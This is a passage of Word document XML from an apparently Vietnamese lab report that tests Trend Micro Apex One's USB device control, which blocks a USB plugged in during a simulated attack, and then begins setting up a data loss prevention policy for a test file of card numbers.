      <w:r w:rsidR="00587118" w:rsidRPr="00F97D30">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">cho tất cả users trên </w:t>
      </w:r>
      <w:r w:rsidR="00713DC0" w:rsidRPr="00F97D30">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">host được </w:t>
      </w:r>
      <w:r w:rsidR="00877C46" w:rsidRPr="00F97D30">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>áp dụng chính sách.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB2961E" w14:textId="4DC9FB9C" w:rsidR="00FE4469" w:rsidRPr="00DA7049" w:rsidRDefault="00FE4469" w:rsidP="00F97D30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE4469">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:noProof/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58C67D5E" wp14:editId="264DD53E">
            <wp:extent cx="5943600" cy="2078355"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="17145"/>
            <wp:docPr id="1906767851" name="Picture 1906767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7851" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId66"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2078355"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C49ACF" w14:textId="279EF0F3" w:rsidR="00ED408E" w:rsidRPr="009104F8" w:rsidRDefault="00DA2326" w:rsidP="009104F8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009104F8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">Tại Storage Devices -&gt; USB storage drives </w:t>
      </w:r>
      <w:r w:rsidR="00050C1D" w:rsidRPr="009104F8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">chọn Block để thực hiện ngăn chặn </w:t>
      </w:r>
      <w:r w:rsidR="00184EA0" w:rsidRPr="009104F8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>mọi quyền từ</w:t>
      </w:r>
      <w:r w:rsidR="00050C1D" w:rsidRPr="009104F8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00184EA0" w:rsidRPr="009104F8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">USB, ngoài ra còn có thể tùy chọn các quyền trên USB </w:t>
      </w:r>
      <w:r w:rsidR="00BF19BC" w:rsidRPr="009104F8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>hoặc ngăn chặn các AutoRun function trên USB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688C635F" w14:textId="3A4087C4" w:rsidR="00184EA0" w:rsidRPr="00DA7049" w:rsidRDefault="00184EA0" w:rsidP="009104F8">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00184EA0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:noProof/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58A53667" wp14:editId="4661B3C6">
            <wp:extent cx="5943600" cy="2632710"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="15240"/>
            <wp:docPr id="1414739261" name="Picture 1414739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9261" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId67"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2632710"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2505BB" w14:textId="4D378956" w:rsidR="00E34048" w:rsidRPr="009104F8" w:rsidRDefault="001D1085" w:rsidP="009104F8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009104F8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Click</w:t>
      </w:r>
      <w:r w:rsidR="00E34048" w:rsidRPr="009104F8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> vào </w:t>
      </w:r>
      <w:r w:rsidR="00D63718" w:rsidRPr="009104F8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Save</w:t>
      </w:r>
      <w:r w:rsidR="00E34048" w:rsidRPr="009104F8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> ở góc dưới màn hình để deploy policy. Quá trình này tốn vài phút để </w:t>
      </w:r>
      <w:r w:rsidR="001B5A82" w:rsidRPr="009104F8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>thực hiện</w:t>
      </w:r>
      <w:r w:rsidR="009104F8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F935F0A" w14:textId="44A61265" w:rsidR="00D63718" w:rsidRPr="009104F8" w:rsidRDefault="008969B5" w:rsidP="009104F8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009104F8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Sau</w:t>
      </w:r>
      <w:r w:rsidRPr="009104F8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> khi cập nhật </w:t>
      </w:r>
      <w:r w:rsidR="00034BBF" w:rsidRPr="009104F8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">chính sách thành công trên </w:t>
      </w:r>
      <w:r w:rsidR="004B5CFC" w:rsidRPr="009104F8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>host</w:t>
      </w:r>
      <w:r w:rsidR="000C70FB" w:rsidRPr="009104F8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>, thực hiện lắng nghe từ máy attacker sau đó cắm USB vào máy nạn nhân.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508A26D5" w14:textId="71428E46" w:rsidR="00D41250" w:rsidRPr="00F0566E" w:rsidRDefault="00D41250" w:rsidP="009104F8">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D41250">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:noProof/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21590027" wp14:editId="1ECF5EF0">
            <wp:extent cx="5943600" cy="2492375"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="22225"/>
            <wp:docPr id="2010682635" name="Picture 2010682635"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2635" name="Picture 1" descr="A computer screen with a white box&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId68"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2492375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1342B4C5" w14:textId="77777777" w:rsidR="00A73E8C" w:rsidRDefault="00A73E8C" w:rsidP="0075136C">
      <w:pPr>
        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B132F5A" w14:textId="6D5E7C2D" w:rsidR="00A73E8C" w:rsidRPr="009104F8" w:rsidRDefault="00A73E8C" w:rsidP="009104F8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009104F8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Lúc này Apex One thực hiện cảnh báo và ngăn chặn từ USB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA7F029" w14:textId="4982322A" w:rsidR="00A73E8C" w:rsidRPr="00F0566E" w:rsidRDefault="00A73E8C" w:rsidP="009104F8">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A73E8C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:noProof/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22CB5338" wp14:editId="0951367B">
            <wp:extent cx="5943600" cy="2487295"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="1956928913" name="Picture 1956928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8913" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId69"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2487295"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F436F2" w14:textId="4C3ADE1D" w:rsidR="00E31ADF" w:rsidRPr="001B14DB" w:rsidRDefault="00447397" w:rsidP="00777654">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc152795845"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Ngăn chặn mất mát dữ liệu</w:t>
      </w:r>
      <w:r w:rsidR="00D9332C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Data Loss Prevention)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="702C8950" w14:textId="63531884" w:rsidR="00D9332C" w:rsidRPr="00A96209" w:rsidRDefault="00FE2ABC" w:rsidP="00A96209">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A96209">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Apex One có khả năng ứng phó với </w:t>
      </w:r>
      <w:r w:rsidR="003C7A3B" w:rsidRPr="00A96209">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">việc mất mát dữ liệu </w:t>
      </w:r>
      <w:r w:rsidR="0013500C" w:rsidRPr="00A96209">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>bằng cách hạn chế những thiết bị USB, CD/DVD</w:t>
      </w:r>
      <w:r w:rsidR="00093F35" w:rsidRPr="00A96209">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> bằng các chính sách </w:t>
      </w:r>
      <w:r w:rsidR="00F5045C" w:rsidRPr="00A96209">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>DLP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A74650" w14:textId="7311F202" w:rsidR="00127820" w:rsidRPr="00A96209" w:rsidRDefault="0025204D" w:rsidP="00A96209">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A96209">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Chống thất thoát dữ liệu trên các lưu trữ cloud nhờ vào thực thi mã hóa tệp cũng như sử dụng ứng dụng SaaS với DLP dành riêng cho Microsoft® Office 365®.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D2035C" w14:textId="224075A0" w:rsidR="0025204D" w:rsidRDefault="00116CD3" w:rsidP="00A96209">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00116CD3">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Phát hiện và phản ứng với việc sử dụng dữ liệu không phù hợp dựa trên từ khóa, regexp và định dạng tệp tin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7189F1" w14:textId="71C0CFE1" w:rsidR="00116CD3" w:rsidRDefault="0099789D" w:rsidP="00A96209">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Nhóm sẽ thử nghiệm tính năng này trong ngữ cảnh</w:t>
      </w:r>
      <w:r w:rsidR="00484F4E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> mất mát dữ liệu tài sản</w:t>
      </w:r>
      <w:r w:rsidR="009C669D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> như</w:t>
      </w:r>
      <w:r w:rsidR="00484F4E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> cred</w:t>
      </w:r>
      <w:r w:rsidR="00DF0E45">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>it card</w:t>
      </w:r>
      <w:r w:rsidR="00866700">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A960BE" w14:textId="40A5764C" w:rsidR="009C669D" w:rsidRDefault="009C669D" w:rsidP="00A96209">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Nhóm tạo 1 file gồm nhữ</w:t>
      </w:r>
      <w:r w:rsidR="008D2CBF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> số thẻ của card visa, paypal để tiến hành thử nghiệm như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF4CE3D" w14:textId="2A6F43D0" w:rsidR="008D2CBF" w:rsidRDefault="00A60FDF" w:rsidP="00BA0AF6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A60FDF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:noProof/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="110D2042" wp14:editId="27ECCDBE">
            <wp:extent cx="5000095" cy="2639290"/>
            <wp:effectExtent l="19050" t="19050" r="10160" b="27940"/>
            <wp:docPr id="1873845127" name="Picture 1873845127"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5127" name="Hình ảnh 1" descr="Ảnh có chứa văn bản, màn hình, ảnh chụp màn hình, máy tính&#10;&#10;Mô tả được tạo tự động"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId70"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5027664" cy="2653842"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="439526D3" w14:textId="4A0677E3" w:rsidR="00866700" w:rsidRPr="00A96209" w:rsidRDefault="009F0BC5" w:rsidP="00A96209">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A96209">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Tạo policy ứng phó với mất mát dữ liệu</w:t>
      </w:r>
      <w:r w:rsidR="00285139" w:rsidRPr="00A96209">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095826D9" w14:textId="415FC9B6" w:rsidR="00285139" w:rsidRPr="00A96209" w:rsidRDefault="00285139" w:rsidP="00A96209">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A96209">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00BA66DB" w:rsidRPr="00A96209">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ruy cập vào thư mục </w:t>
      </w:r>
      <w:r w:rsidR="00930D54" w:rsidRPr="00A96209">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Policies -&gt; Policy management</w:t>
      </w:r>
      <w:r w:rsidR="00012294" w:rsidRPr="00A96209">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, tại mục product</w:t>
      </w:r>
      <w:r w:rsidR="0085259D" w:rsidRPr="00A96209">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> chọn </w:t>
      </w:r>
      <w:r w:rsidR="009B63CB" w:rsidRPr="00A96209">
